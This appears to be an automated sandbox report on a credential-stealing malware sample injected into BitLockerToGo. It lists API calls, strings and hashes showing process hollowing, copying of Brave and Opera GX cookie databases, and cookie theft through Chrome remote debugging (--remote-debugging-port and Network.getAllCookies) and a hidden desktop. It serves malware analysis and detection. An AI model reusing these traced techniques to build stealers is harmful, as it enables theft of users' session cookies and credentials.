74829 8f36dc 74830 8f2143 lstrcpy 74829->74830 74831 8f36e3 VariantClear 74830->74831 74831->74823 74832->74271 74834 8f2143 lstrcpy 74833->74834 74835 8f3229 
74834->74835 74835->74286 74837 8f2143 lstrcpy 74836->74837 74838 8f2a5e GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 74837->74838 74839 8f2b49 74838->74839 74847 8f2a98 74838->74847 74841 8f2b55 LocalFree 74839->74841 74842 8f2b61 74839->74842 74840 8f2a9e GetLocaleInfoA 74840->74847 74841->74842 74843 8fe88c ___crtMessageBoxW 5 API calls 74842->74843 74844 8f2b71 74843->74844 74844->74300 74845 8f2265 lstrlen lstrcpy lstrcat 74845->74847 74846 8f21e9 lstrcpy 74846->74847 74847->74839 74847->74840 74847->74845 74847->74846 74849 8f29c6 wsprintfA 74848->74849 74850 8f29e2 74848->74850 74849->74850 74851 8fe88c ___crtMessageBoxW 5 API calls 74850->74851 74852 8f29ef 74851->74852 74852->74328 74854 8f2c08 RegCloseKey 74853->74854 74855 8f2bf0 RegQueryValueExA 74853->74855 74854->74345 74855->74854 74857 8f2cd8 GetLogicalProcessorInformationEx 74856->74857 74858 8f2ca4 GetLastError 74857->74858 74860 8f2ce3 74857->74860 74859 8f2d4f 74858->74859 74869 8f2cb3 74858->74869 74862 8f2d48 74859->74862 74963 8f37b7 GetProcessHeap HeapFree 74859->74963 74962 8f37b7 GetProcessHeap HeapFree 74860->74962 74867 8fe88c ___crtMessageBoxW 5 API calls 74862->74867 74863 8f2d1c 74863->74862 74868 8f2d25 wsprintfA 74863->74868 74870 8f2d73 74867->74870 74868->74862 74869->74857 74869->74862 74960 8f37b7 GetProcessHeap HeapFree 74869->74960 74961 8f37d4 GetProcessHeap RtlAllocateHeap 74869->74961 74870->74360 74872 8fe88c ___crtMessageBoxW 5 API calls 74871->74872 74873 8f2c61 74872->74873 74873->74374 74964 8f3782 74874->74964 74877 8f2dbb wsprintfA 74879 8fe88c ___crtMessageBoxW 5 API calls 74877->74879 74880 8f2dec 74879->74880 74880->74388 74882 8f2143 lstrcpy 74881->74882 74883 8f2e0f 74882->74883 74884 8f2e3b EnumDisplayDevicesA 74883->74884 74885 8f2e4f 74883->74885 74886 8f21a5 2 API calls 74883->74886 74884->74883 74884->74885 74887 8fe88c ___crtMessageBoxW 5 API calls 74885->74887 74886->74883 74888 8f2e5d 74887->74888 74888->74402 74890 8f2143 lstrcpy 74889->74890 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
• Opcode ID: 9c6d769fa6747e86939cbf30bf1462a83ae3472cbe0625df74570c83607336b7
• Instruction ID: 9f6123220b008396b82a6d1c896535e3484862a44d04d63235ae1c00d1b483bb
• Opcode Fuzzy Hash: 9c6d769fa6747e86939cbf30bf1462a83ae3472cbe0625df74570c83607336b7
• Instruction Fuzzy Hash: 9D52E279901211FFDB2A9FA4EE0AD653BB6F7183463404625EA55E3230DF329863EF11

Control-flow Graph
APIs
  • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
  • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
  • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
  • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
  • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
  • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
  • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
• FindFirstFileA.KERNEL32(?,?,0091786B,0091786A,00918464,00917867,?,?,?), ref: 008EA9EB
• StrCmpCA.SHLWAPI(?,00918468), ref: 008EAA13
• StrCmpCA.SHLWAPI(?,0091846C), ref: 008EAA2D
  • Part of subcall function 008F21A5: lstrlen.KERNEL32(?,?,008F9098,009177FE,00917787,?,?,?,?,008F9D6E), ref: 008F21AB
  • Part of subcall function 008F21A5: lstrcpy.KERNEL32(00000000,00000000), ref: 008F21DD
• StrCmpCA.SHLWAPI(?,Opera GX,00918470,?,0091786E), ref: 008EAABF
• StrCmpCA.SHLWAPI(?,Brave,00918490,00918494,00918470,?,0091786E), ref: 008EAC41
• StrCmpCA.SHLWAPI(?,Preferences), ref: 008EAC5B
• CopyFileA.KERNEL32(?,?,00000001), ref: 008EAD1B
• DeleteFileA.KERNEL32(?), ref: 008EADEA
• StrCmpCA.SHLWAPI(?), ref: 008EAE28
• StrCmpCA.SHLWAPI(?), ref: 008EAE92
• StrCmpCA.SHLWAPI(008EDCCC), ref: 008EAEA9
• CopyFileA.KERNEL32(?,?,00000001), ref: 008EAFA1
  • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
  • Part of subcall function 008F40F6: _memset.LIBCMT ref: 008F411D
  • Part of subcall function 008F40F6: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 008F41C3
  • Part of subcall function 008F40F6: TerminateProcess.KERNEL32(00000000,00000000), ref: 008F41D1
  • Part of subcall function 008F40F6: CloseHandle.KERNEL32(00000000), ref: 008F41D8
• _memset.LIBCMT ref: 008EB03F
• lstrcat.KERNEL32(?,?), ref: 008EB051
• lstrcat.KERNEL32(?,?), ref: 008EB061
• _memset.LIBCMT ref: 008EB251
• lstrcat.KERNEL32(?,?), ref: 008EB263
• lstrcat.KERNEL32(?,?), ref: 008EB273
• lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 008EB285
• StrCmpCA.SHLWAPI(?), ref: 008EB2D3
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EB393
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EB43E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008EB46F
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?, --remote-debugging-port=9223 --profile-directory="), ref: 008EB073
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EB1B8
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008EB52F
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008EB5C9
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008EB6A7
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008EB6BB
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$lstrcat$lstrcpy$Copy$CloseDeleteFind_memset$CreateHandleProcesslstrlen$AllocFirstLocalNextObjectOpenReadSingleSizeSystemTerminateThreadTimeWait
                                                                                                                                                                                                                                                                                                                    • String ID: --remote-debugging-port=9223 --profile-directory="$ --remote-debugging-port=9223 --profile-directory="$Brave$Opera GX$Preferences$\BraveWallet\Preferences$_cookies.db$_cookies.db$_webdata.db
                                                                                                                                                                                                                                                                                                                    • API String ID: 1219303437-2271920603
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d2b288c9edf630cca9724c827aa0ef6495594cec6abe350fa38aa9376070f2b
                                                                                                                                                                                                                                                                                                                    • Instruction ID: ef48621bfdeb0bb765f54587c1f56a56d748845959df2998694fa7c727773781
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d2b288c9edf630cca9724c827aa0ef6495594cec6abe350fa38aa9376070f2b
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4072E53190026D9BCB21FB69DD46ADDB778FF05305F4105A1BA08F3162DA71AF998F82

                                                                                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F0532: std::_Xinvalid_argument.LIBCPMT ref: 008F054B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F045E: _memmove.LIBCMT ref: 008F0478
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F02CD: memchr.MSVCRT ref: 008F0336
                                                                                                                                                                                                                                                                                                                    • WSAStartup.WS2_32(00000202,?), ref: 008E8241
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F0532: _memmove.LIBCMT ref: 008F059D
                                                                                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 008E825D
                                                                                                                                                                                                                                                                                                                    • WSACleanup.WS2_32 ref: 008E826E
                                                                                                                                                                                                                                                                                                                    • getaddrinfo.WS2_32(?,00000000,?,?), ref: 008E82CD
                                                                                                                                                                                                                                                                                                                    • closesocket.WS2_32(?), ref: 008E82DD
                                                                                                                                                                                                                                                                                                                    • WSACleanup.WS2_32 ref: 008E82E3
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    • :, xrefs: 008E816B
                                                                                                                                                                                                                                                                                                                    • ws://, xrefs: 008E8055
                                                                                                                                                                                                                                                                                                                    • Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: , xrefs: 008E8435
                                                                                                                                                                                                                                                                                                                    • HTTP/1.1Host: , xrefs: 008E83AB
                                                                                                                                                                                                                                                                                                                    • {"id":1,"method":"Network.getAllCookies"}, xrefs: 008E859F
                                                                                                                                                                                                                                                                                                                    • Sec-WebSocket-Version: 13, xrefs: 008E847A
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000A7A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2669925750.0000000000B21000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2670751344.0000000000B33000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Cleanup_memmove$StartupXinvalid_argumentclosesocketgetaddrinfomemchrsocketstd::_
                                                                                                                                                                                                                                                                                                                    • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Network.getAllCookies"}
                                                                                                                                                                                                                                                                                                                    • API String ID: 2519114892-1552268179

Control-flow Graph: first block 8f6a05-8f6aac
APIs
• wsprintfA.USER32 ref: 008F6A59
• FindFirstFileA.KERNEL32(?,?), ref: 008F6A70
• _memset.LIBCMT ref: 008F6A8C
• _memset.LIBCMT ref: 008F6A9D
• StrCmpCA.SHLWAPI(?,00917A38), ref: 008F6ABE
• StrCmpCA.SHLWAPI(?,00917A3C), ref: 008F6AD8
• wsprintfA.USER32 ref: 008F6AFF
• StrCmpCA.SHLWAPI(?,0091766E), ref: 008F6B13
• wsprintfA.USER32 ref: 008F6B3C
• wsprintfA.USER32 ref: 008F6B53
  • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
  • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
  • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
  • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
  • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
  • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
• _memset.LIBCMT ref: 008F6B65
• lstrcat.KERNEL32(?,?), ref: 008F6B7A
• strtok_s.MSVCRT ref: 008F6BBF
• _memset.LIBCMT ref: 008F6BD1
• lstrcat.KERNEL32(?,?), ref: 008F6BE6
• strtok_s.MSVCRT ref: 008F6BFF
• PathMatchSpecA.SHLWAPI(?,00000000), ref: 008F6C14
• DeleteFileA.KERNEL32(?,00917A68,0091766F), ref: 008F6CCD
• CopyFileA.KERNEL32(?,?,00000001), ref: 008F6CDD
  • Part of subcall function 008F3DFD: CreateFileA.KERNEL32(008F6CE9,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,008F6CE9,?), ref: 008F3E18
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008F6CF3
• DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 008F6CFE
• strtok_s.MSVCRT ref: 008F6D24
• FindNextFileA.KERNELBASE(?,?), ref: 008F6E42
• FindClose.KERNEL32(?), ref: 008F6E62
Strings
Similarity
• API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
• String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
• API String ID: 956187361-332874205

                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(6C9FF688,00001000), ref: 6C9735D5
                                                                                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C9735E0
                                                                                                                                                                                                                                                                                                                    • QueryPerformanceFrequency.KERNEL32(?), ref: 6C9735FD
                                                                                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C97363F
                                                                                                                                                                                                                                                                                                                    • GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C97369F
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C9736E4
                                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C973773
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FF688), ref: 6C97377E
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FF688), ref: 6C9737BD
                                                                                                                                                                                                                                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 6C9737C4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(6C9FF688), ref: 6C9737CB
                                                                                                                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(6C9FF688), ref: 6C973801
                                                                                                                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6C973883
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C973902
                                                                                                                                                                                                                                                                                                                    • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C973918
                                                                                                                                                                                                                                                                                                                    • _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C97394C
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
                                                                                                                                                                                                                                                                                                                    • String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC

                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                                                                                                                                                                                                                                                                                                                    • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8E2B
                                                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 008E8E44
                                                                                                                                                                                                                                                                                                                    • OpenDesktopA.USER32(?,00000000,00000001,10000000), ref: 008E8E5D
                                                                                                                                                                                                                                                                                                                    • CreateDesktopA.USER32(?,00000000,00000000,00000000,10000000,00000000), ref: 008E8E79
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8E99
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E8EAE
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 008E8EC1
                                                                                                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,0091821C), ref: 008E8ED3
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8EE2
                                                                                                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 008E8F13
                                                                                                                                                                                                                                                                                                                    • _memset.LIBCMT ref: 008E8F30
                                                                                                                                                                                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 008E8F8B
                                                                                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00001388), ref: 008E8F9A
                                                                                                                                                                                                                                                                                                                    • CloseDesktop.USER32(?), ref: 008E8FCF
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: _memset$Desktoplstrcat$Create$CloseOpenProcessSleeplstrcpywsprintf
                                                                                                                                                                                                                                                                                                                    • String ID: ChromeBuildTools$D$OCALAPPDATA
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A16
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 008E4A1C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: lstrlen.KERNEL32(000000FF,00000000,?), ref: 008E4A2E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E49DE: InternetCrackUrlA.WININET(000000FF,00000000), ref: 008E4A36
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 008E68F1
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 008E690B
                                                                                                                                                                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 008E693A
                                                                                                                                                                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 008E6979
                                                                                                                                                                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 008E69A9
                                                                                                                                                                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008E69B4
                                                                                                                                                                                                                                                                                                                    • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 008E69D8
                                                                                                                                                                                                                                                                                                                    • InternetReadFile.WININET(?,?,000007CF,?), ref: 008E6A6C
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6A7C
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6A88
                                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 008E6A94
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Internet$lstrcpy$CloseHandleHttp$OpenRequestlstrlen$ConnectCrackFileInfoOptionQueryReadSendlstrcat
                                                                                                                                                                                                                                                                                                                    • String ID: ERROR$ERROR$GET
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2143: lstrcpy.KERNEL32(00000000,00000000), ref: 008F2169
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0091BBCC,0091BBD0,00917AC2,00917ABF,008F953D,?,00000000), ref: 008E1F94
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091BBD4), ref: 008E1FC7
                                                                                                                                                                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,0091BBD8), ref: 008E1FE1
                                                                                                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,0091BBDC,0091BBE0,?,0091BBE4,00917AC3), ref: 008E20CD
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E22B3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F3A18: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 008F3A59
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcpy.KERNEL32(00000000,?), ref: 008F2251
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2223: lstrcat.KERNEL32(?,?), ref: 008F225B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F21E9: lstrcpy.KERNEL32(00000000,?), ref: 008F2219
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E2326
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008E2392
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008E23A6
                                                                                                                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 008E25CC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E9163
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,008EF752,?,?,?), ref: 008E917A
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,008EF752,?,?,?), ref: 008E9191
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,008EF752,?,?,?), ref: 008E91A8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008E9148: CloseHandle.KERNEL32(?,?,?,?,?,008EF752,?,?,?), ref: 008E91D0
                                                                                                                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 008E263F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: Sleep.KERNEL32(000003E8,?,?), ref: 008F8C4D
                                                                                                                                                                                                                                                                                                                    • FindNextFileA.KERNEL32(?,?), ref: 008E26B6
                                                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 008E26CA
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2175: lstrcpy.KERNEL32(00000000,?), ref: 008F2194
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: CreateThread.KERNEL32(00000000,00000000,008F8B15,?,00000000,00000000), ref: 008F8C85
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F8BE6: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 008F8C8D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrlen.KERNEL32(?,?,?,008F8FD9,abc_,00000000,00917786,?,?,?,?,008F9D6E), ref: 008F2279
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcpy.KERNEL32(00000000,?), ref: 008F22A1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F2265: lstrcat.KERNEL32(?,00000000), ref: 008F22AC
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F39EE: GetFileAttributesA.KERNEL32(?,?,?,008EEA72,?,?,?), ref: 008F39F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 008F38A6: GetSystemTime.KERNEL32(?,00917807,?), ref: 008F38D5
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2669758364.00000000008E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_8e0000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Yara matches
